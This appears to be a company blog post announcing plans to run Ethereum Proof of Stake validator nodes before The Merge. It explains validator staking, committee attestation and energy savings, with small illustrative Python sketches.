As recently as two years ago, web3 was an up-and-coming ecosystem with minimal traffic compared to the majority of the traffic on the Internet. The last two years changed the web3 use landscape. Traffic to the Bitcoin and the Ethereum networks has exploded. Technologies like Smart Contracts that power DeFi, NFTs, and DAOs have started to become commonplace in the developer community (and in the Twitter lexicon). The next generation of blockchains like Flow, Avalanche, Solana, as well as Polygon are being developed and adopted by major companies like Meta.

In order to balance our commitment to the environment and to help build a better Internet, it is clear to us that we should launch new experiments to help find a path forward. A path that balances the clear need to drastically reduce the energy consumption of web3 technologies and the capability to scale the web3 networks by orders of magnitude if the need arises to support increased user adoption over the next five years. How do we do that? We believe that the next generation of consensus protocols is likely to be based on Proof of Stake and Proof of Spacetime consensus mechanisms.

Today, we are excited to announce the start of our experiments for the next generation of web3 networks that are embracing Proof of Stake; beginning with Ethereum. Over the next few months, Cloudflare will launch, and fully stake, Ethereum validator nodes on the Cloudflare global network as the community approaches its transition from Proof of Work to Proof of Stake with “The Merge.” These nodes will serve as a testing ground for research on energy efficiency, consistency management, and network speed.

There is a lot in that paragraph so let’s break it down! The short version though is that Cloudflare is going to participate in the research and development of the core infrastructure that helps keep Ethereum secure, fast, as well as energy efficient for everyone.

Proof of Stake is a next-generation consensus protocol to secure blockchains. Unlike Proof of Work, which relies on miners racing each other with increasingly complex cryptography to mine a block, Proof of Stake secures new transactions to the network through self-interest. Validator nodes (the parties who verify new blocks for the chain) are required to put a significant asset up as collateral in a smart contract to prove that they will act in good faith. For instance, for Ethereum that is 32 ETH. Validator nodes that follow the network’s rules earn rewards; validators that violate the rules will have portions of their stake taken away. Anyone can operate a validator node as long as they meet the stake requirement. This is key. Proof of Stake networks require lots and lots of validator nodes to validate and attest to new transactions. The more participants there are in the network, the harder it is for bad actors to launch a 51% attack to compromise the security of the blockchain.

To add new blocks to the Ethereum chain, once it shifts to Proof of Stake, validators are chosen at random to create new blocks (validate). Once they have a new block ready it is submitted to a committee of 128 other validators who act as attestors. They verify that the transactions included in the block are legitimate and that the block is not malicious. If the block is found to be valid, it is this attestation that is added to the blockchain. Critically, the validation and attestation process is not computationally complex. This reduction in complexity leads to significant energy efficiency improvements.
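
Here is a highly simplified Python sketch of that proposer-and-committee flow (the two-thirds threshold is our assumption for illustration; the real Beacon Chain adds epochs, RANDAO-based randomness, rewards, and slashing that this toy model ignores):

import random

STAKE_ETH = 32  # collateral each Ethereum validator locks in a smart contract

validators = [f"validator-{i:04d}" for i in range(10_000)]

# One validator is chosen at random to propose (validate) the next block...
proposer = random.choice(validators)

# ...and a committee of 128 other validators attests to it.
committee = random.sample([v for v in validators if v != proposer], k=128)

# Toy model: every committee member inspects the block and votes "valid".
votes = len(committee)
accepted = votes * 3 >= len(committee) * 2  # assumed two-thirds threshold
print(f"{proposer} proposed a block; accepted={accepted}")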

The energy required to operate a Proof of Stake validator node is orders of magnitude less than that required by a Proof of Work miner. Early estimates from the Ethereum Foundation suggest that the entire Ethereum network could use as little as 2.6 megawatts of power. Put another way, Ethereum will use 99.5% less energy post-merge than today.
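
Putting those two figures together gives a rough back-of-the-envelope check (our arithmetic from the numbers above, not an official estimate):

# If ~2.6 MW after The Merge represents a 99.5% reduction, the implied
# consumption today is 2.6 / (1 - 0.995).
post_merge_mw = 2.6
reduction = 0.995
pre_merge_mw = post_merge_mw / (1 - reduction)
print(f"~{pre_merge_mw:.0f} MW today vs ~{post_merge_mw} MW post-merge")  # ~520 MW vs ~2.6 MW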

We are going to support the development and deployment of Ethereum by running Proof of Stake validator nodes on our network. For the Ethereum ecosystem, running validator nodes on our network allows us to offer even more geographic decentralization in places like EMEA, LATAM, and APJC, while also adding infrastructure decentralization to the network. This helps keep the network secure, outage-resistant, and closer to the goal of global decentralization for everyone. For us, it’s a commitment to helping research and experiment with scaling the next generation of blockchain networks, which could be a key part of the story of the Internet. Running blockchain technology at scale is incredibly difficult, and Proof of Stake systems have their own unique requirements that will take time to understand and improve. Part of this experimentation, though, is a commitment: as part of our experiments, Cloudflare has not and will not run our own Proof of Work infrastructure on our network.

Finally, what is “The Merge”? The Merge is the planned combination of the Ethereum Mainnet (the chain you interact with today when you make an Eth transaction) and the Ethereum Beacon Chain. The Beacon chain is the Proof of Stake blockchain running in parallel with the Ethereum Mainnet. The Merge is much more significant than a consensus update.

Consensus updates have happened multiple times already on Ethereum, whether to fix a vulnerability or to introduce new features. The Merge is different in that it cannot be made via a normal upgrade. Previous forks have been enabled at a specific block number; this means that if you mine enough blocks, the new consensus rules apply automatically. With the Merge, there should be only one state root at which the fork happens. That merge state root marks the start of the Ethereum Mainnet PoS journey. It is chosen and set at a certain total difficulty, instead of a block height, to avoid merging at a high block with low difficulty.
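
The difference between the two fork triggers can be sketched in a few lines of Python (the function names and numbers are placeholders of ours, not Ethereum’s actual terminal total difficulty):

def height_fork_active(block_height: int, fork_height: int) -> bool:
    # A classic hard fork: the new rules switch on at a fixed block number.
    return block_height >= fork_height

def merge_reached(total_difficulty: int, terminal_total_difficulty: int) -> bool:
    # The Merge: triggered by cumulative proof-of-work difficulty rather than
    # height, so a run of low-difficulty blocks cannot force an early switch.
    return total_difficulty >= terminal_total_difficulty

print(height_fork_active(15_000_000, 15_000_000))   # True: height reached
print(merge_reached(10 ** 21, 5 * 10 ** 21))        # False: keep following PoW rules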

Once The Merge occurs later this year in 2022, Ethereum will be a full Proof of Stake ecosystem that no longer relies on Proof of Work.

This is just the start of our commitment to help build the next generation of web3 networks. We are excited to work with our partners across the cryptography, web3, and infrastructure communities to help create the next generation of blockchain ecosystems that are environmentally sustainable, secure, and blazing fast.